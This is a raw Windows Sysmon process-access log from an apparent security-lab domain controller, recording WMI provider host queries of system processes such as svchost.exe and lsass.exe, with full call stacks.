13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005183Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005182Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005181Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005180Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005179Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005178Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005177Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005176Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005175Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005174Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005173Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005172Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005171Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005170Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005169Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005168Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 